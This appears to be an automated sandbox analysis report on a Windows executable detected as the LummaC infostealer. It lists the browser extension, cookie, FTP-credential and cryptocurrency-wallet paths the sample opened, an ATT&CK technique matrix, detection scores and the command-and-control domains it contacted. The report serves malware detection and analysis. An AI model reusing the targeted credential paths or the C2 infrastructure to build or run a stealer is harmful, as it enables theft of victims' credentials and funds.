                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
                Tries to harvest and steal ftp login credentials
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
                Tries to steal Crypto Currency Wallets
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeDirectory queried: C:\Users\user\Documents\FENIVHOIKNJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeDirectory queried: C:\Users\user\Documents\FENIVHOIKNJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeDirectory queried: C:\Users\user\Documents\HTAGVDFUIEJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeDirectory queried: C:\Users\user\Documents\HTAGVDFUIEJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeDirectory queried: C:\Users\user\Documents\KATAXZVCPSJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeDirectory queried: C:\Users\user\Documents\KATAXZVCPSJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeDirectory queried: C:\Users\user\Documents\KZWFNRXYKIJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeDirectory queried: C:\Users\user\Documents\KZWFNRXYKIJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeDirectory queried: C:\Users\user\Documents\YPSIACHYXWJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeDirectory queried: C:\Users\user\Documents\YPSIACHYXWJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeDirectory queried: C:\Users\user\Documents\HTAGVDFUIEJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeDirectory queried: C:\Users\user\Documents\HTAGVDFUIEJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeDirectory queried: C:\Users\user\Documents\KZWFNRXYKIJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeDirectory queried: C:\Users\user\Documents\KZWFNRXYKIJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeDirectory queried: C:\Users\user\Documents\FENIVHOIKNJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeDirectory queried: C:\Users\user\Documents\FENIVHOIKNJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeDirectory queried: C:\Users\user\Documents\WKXEWIOTXIJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeDirectory queried: C:\Users\user\Documents\WKXEWIOTXIJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeDirectory queried: C:\Users\user\Documents\HTAGVDFUIEJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeDirectory queried: C:\Users\user\Documents\HTAGVDFUIEJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeDirectory queried: C:\Users\user\Documents\KATAXZVCPSJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeDirectory queried: C:\Users\user\Documents\KATAXZVCPSJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeDirectory queried: C:\Users\user\Documents\MXPXCVPDVNJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeDirectory queried: C:\Users\user\Documents\MXPXCVPDVNJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeDirectory queried: C:\Users\user\Documents\KATAXZVCPSJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeDirectory queried: C:\Users\user\Documents\KATAXZVCPSJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeDirectory queried: C:\Users\user\Documents\WKXEWIOTXIJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeDirectory queried: C:\Users\user\Documents\WKXEWIOTXIJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeDirectory queried: C:\Users\user\Documents\YPSIACHYXWJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeDirectory queried: C:\Users\user\Documents\YPSIACHYXWJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeDirectory queried: C:\Users\user\Documents\FENIVHOIKNJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeDirectory queried: C:\Users\user\Documents\FENIVHOIKNJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeDirectory queried: C:\Users\user\Documents\MXPXCVPDVNJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeDirectory queried: C:\Users\user\Documents\MXPXCVPDVNJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeDirectory queried: C:\Users\user\Documents\KZWFNRXYKIJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeDirectory queried: C:\Users\user\Documents\KZWFNRXYKIJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeDirectory queried: number of queries: 1001
                Source: Yara matchFile source: 00000000.00000003.1998585611.0000000001A3C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.1998932614.00000000019F1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.1998797783.00000000019F0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.1998637407.00000000019E5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: gJkNLYV0ax.exe PID: 7308, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Yara detected LummaC Stealer
                Source: Yara matchFile source: Process Memory Space: gJkNLYV0ax.exe PID: 7308, type: MEMORYSTR
                Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
                Windows Management Instrumentation                		1
                DLL Side-Loading                		1
                Process Injection                		34
                Virtualization/Sandbox Evasion                		2
                OS Credential Dumping                		1
                Query Registry                		Remote Services1
                Archive Collected Data                		11
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts1
                PowerShell                		Boot or Logon Initialization Scripts1
                DLL Side-Loading                		1
                Process Injection                		LSASS Memory751
                Security Software Discovery                		Remote Desktop Protocol41
                Data from Local System                		2
                Non-Application Layer Protocol                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
                Deobfuscate/Decode Files or Information                		Security Account Manager34
                Virtualization/Sandbox Evasion                		SMB/Windows Admin SharesData from Network Shared Drive113
                Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook2
                Obfuscated Files or Information                		NTDS2
                Process Discovery                		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script12
                Software Packing                		LSA Secrets2
                File and Directory Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                DLL Side-Loading                		Cached Domain Credentials223
                System Information Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                gJkNLYV0ax.exe57%VirustotalBrowse
                gJkNLYV0ax.exe66%ReversingLabsWin32.Trojan.Symmi
                gJkNLYV0ax.exe100%AviraTR/Crypt.XPACK.Gen
                gJkNLYV0ax.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                No Antivirus matches

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                discokeyus.lat
                		104.21.21.99
                		truefalse
                  		high
                  grannyejh.lat
                  		unknown
                  		unknownfalse
                    		high
                    sweepyribs.lat
                    		unknown
                    		unknownfalse
                      		high

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      necklacebudi.latfalse
                        		high
                        https://discokeyus.lat/apifalse
                          		high
                          aspecteirs.latfalse
                            		high
                            sweepyribs.latfalse
                              		high
                              sustainskelet.latfalse
                                		high
                                crosshuaht.latfalse
                                  		high
                                  rapeflowwj.latfalse
                                    		high
                                    energyaffai.latfalse
                                      		high
                                      grannyejh.latfalse
                                        		high
                                        discokeyus.latfalse
                                          		high

                                          URLs from Memory and Binaries

                                          NameSourceMaliciousAntivirus DetectionReputation
                                          https://duckduckgo.com/chrome_newtabgJkNLYV0ax.exe, 00000000.00000003.1918466452.00000000060CD000.00000004.00000800.00020000.00000000.sdmp, gJkNLYV0ax.exe, 00000000.00000003.1918537729.00000000060CB000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            https://duckduckgo.com/ac/?q=gJkNLYV0ax.exe, 00000000.00000003.1918466452.00000000060CD000.00000004.00000800.00020000.00000000.sdmp, gJkNLYV0ax.exe, 00000000.00000003.1918537729.00000000060CB000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvnwP44gJkNLYV0ax.exe, 00000000.00000003.1993681289.0000000006083000.00000004.00000800.00020000.00000000.sdmp, gJkNLYV0ax.exe, 00000000.00000003.1995668126.0000000006083000.00000004.00000800.00020000.00000000.sdmp, gJkNLYV0ax.exe, 00000000.00000003.1993011563.0000000006083000.00000004.00000800.00020000.00000000.sdmp, gJkNLYV0ax.exe, 00000000.00000003.1993362306.0000000006083000.00000004.00000800.00020000.00000000.sdmp, gJkNLYV0ax.exe, 00000000.00000003.1995975300.0000000006083000.00000004.00000800.00020000.00000000.sdmp, gJkNLYV0ax.exe, 00000000.00000003.1992273154.0000000006082000.00000004.00000800.00020000.00000000.sdmp, gJkNLYV0ax.exe, 00000000.00000003.1998731158.0000000006089000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                https://discokeyus.lat/MgJkNLYV0ax.exe, 00000000.00000003.1917456355.00000000019C2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		unknown
                                                  https://discokeyus.lat:443/apifqs92o4p.default-release/key4.dbPKgJkNLYV0ax.exe, 00000000.00000003.2025868617.00000000019C2000.00000004.00000020.00020000.00000000.sdmp, gJkNLYV0ax.exe, 00000000.00000002.2085606475.00000000019C2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		unknown
                                                    https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=gJkNLYV0ax.exe, 00000000.00000003.1918466452.00000000060CD000.00000004.00000800.00020000.00000000.sdmp, gJkNLYV0ax.exe, 00000000.00000003.1918537729.00000000060CB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17gJkNLYV0ax.exe, 00000000.00000003.1918843535.00000000060E0000.00000004.00000800.00020000.00000000.sdmp, gJkNLYV0ax.exe, 00000000.00000003.1941252262.00000000060D9000.00000004.00000800.00020000.00000000.sdmp, gJkNLYV0ax.exe, 00000000.00000003.1941148892.00000000060D9000.00000004.00000800.00020000.00000000.sdmp, gJkNLYV0ax.exe, 00000000.00000003.1918935202.00000000060D9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        http://crl.micro0gJkNLYV0ax.exe, 00000000.00000003.1998932614.00000000019F1000.00000004.00000020.00020000.00000000.sdmp, gJkNLYV0ax.exe, 00000000.00000003.1998797783.00000000019F0000.00000004.00000020.00020000.00000000.sdmp, gJkNLYV0ax.exe, 00000000.00000003.1998637407.00000000019E5000.00000004.00000020.00020000.00000000.sdmp, gJkNLYV0ax.exe, 00000000.00000003.1917303362.00000000019F1000.00000004.00000020.00020000.00000000.sdmp, gJkNLYV0ax.exe, 00000000.00000003.2084411862.0000000001A2F000.00000004.00000020.00020000.00000000.sdmp, gJkNLYV0ax.exe, 00000000.00000003.2027466840.00000000019F1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfgJkNLYV0ax.exe, 00000000.00000003.1993681289.0000000006083000.00000004.00000800.00020000.00000000.sdmp, gJkNLYV0ax.exe, 00000000.00000003.1995668126.0000000006083000.00000004.00000800.00020000.00000000.sdmp, gJkNLYV0ax.exe, 00000000.00000003.1993011563.0000000006083000.00000004.00000800.00020000.00000000.sdmp, gJkNLYV0ax.exe, 00000000.00000003.1993362306.0000000006083000.00000004.00000800.00020000.00000000.sdmp, gJkNLYV0ax.exe, 00000000.00000003.1995975300.0000000006083000.00000004.00000800.00020000.00000000.sdmp, gJkNLYV0ax.exe, 00000000.00000003.1992273154.0000000006082000.00000004.00000800.00020000.00000000.sdmp, gJkNLYV0ax.exe, 00000000.00000003.1998731158.0000000006089000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://discokeyus.lat/apiU2gJkNLYV0ax.exe, 00000000.00000003.1998932614.00000000019F1000.00000004.00000020.00020000.00000000.sdmp, gJkNLYV0ax.exe, 00000000.00000003.1998797783.00000000019F0000.00000004.00000020.00020000.00000000.sdmp, gJkNLYV0ax.exe, 00000000.00000003.1998637407.00000000019E5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		unknown
                                                              https://discokeyus.lat/tgJkNLYV0ax.exe, 00000000.00000003.1917456355.00000000019BD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		unknown
                                                                http://x1.c.lencr.org/0gJkNLYV0ax.exe, 00000000.00000003.1963875994.00000000060CB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  http://x1.i.lencr.org/0gJkNLYV0ax.exe, 00000000.00000003.1963875994.00000000060CB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17InstallgJkNLYV0ax.exe, 00000000.00000003.1918935202.00000000060B4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchgJkNLYV0ax.exe, 00000000.00000003.1918466452.00000000060CD000.00000004.00000800.00020000.00000000.sdmp, gJkNLYV0ax.exe, 00000000.00000003.1918537729.00000000060CB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://discokeyus.lat:443/api5gJkNLYV0ax.exe, 00000000.00000003.2025868617.00000000019C2000.00000004.00000020.00020000.00000000.sdmp, gJkNLYV0ax.exe, 00000000.00000003.1917456355.00000000019C2000.00000004.00000020.00020000.00000000.sdmp, gJkNLYV0ax.exe, 00000000.00000002.2085606475.00000000019C2000.00000004.00000020.00020000.00000000.sdmp, gJkNLYV0ax.exe, 00000000.00000003.1998637407.00000000019C2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          		unknown
                                                                          https://support.mozilla.org/products/firefoxgro.allgJkNLYV0ax.exe, 00000000.00000003.1965537429.00000000061A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://discokeyus.lat/apiKed5gJkNLYV0ax.exe, 00000000.00000002.2087129404.0000000006080000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		unknown
                                                                              https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpggJkNLYV0ax.exe, 00000000.00000003.1993681289.0000000006083000.00000004.00000800.00020000.00000000.sdmp, gJkNLYV0ax.exe, 00000000.00000003.1995668126.0000000006083000.00000004.00000800.00020000.00000000.sdmp, gJkNLYV0ax.exe, 00000000.00000003.1993011563.0000000006083000.00000004.00000800.00020000.00000000.sdmp, gJkNLYV0ax.exe, 00000000.00000003.1993362306.0000000006083000.00000004.00000800.00020000.00000000.sdmp, gJkNLYV0ax.exe, 00000000.00000003.1995975300.0000000006083000.00000004.00000800.00020000.00000000.sdmp, gJkNLYV0ax.exe, 00000000.00000003.1992273154.0000000006082000.00000004.00000800.00020000.00000000.sdmp, gJkNLYV0ax.exe, 00000000.00000003.1998731158.0000000006089000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://www.google.com/images/branding/product/ico/googleg_lodp.icogJkNLYV0ax.exe, 00000000.00000003.1918466452.00000000060CD000.00000004.00000800.00020000.00000000.sdmp, gJkNLYV0ax.exe, 00000000.00000003.1918537729.00000000060CB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://discokeyus.lat/apibygJkNLYV0ax.exe, 00000000.00000002.2085682261.00000000019F1000.00000004.00000020.00020000.00000000.sdmp, gJkNLYV0ax.exe, 00000000.00000003.2084563810.00000000019F1000.00000004.00000020.00020000.00000000.sdmp, gJkNLYV0ax.exe, 00000000.00000003.2027466840.00000000019F1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    		unknown
                                                                                    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=gJkNLYV0ax.exe, 00000000.00000003.1918466452.00000000060CD000.00000004.00000800.00020000.00000000.sdmp, gJkNLYV0ax.exe, 00000000.00000003.1918537729.00000000060CB000.00000004.00000800.00020000.00000000.sdmpfalse
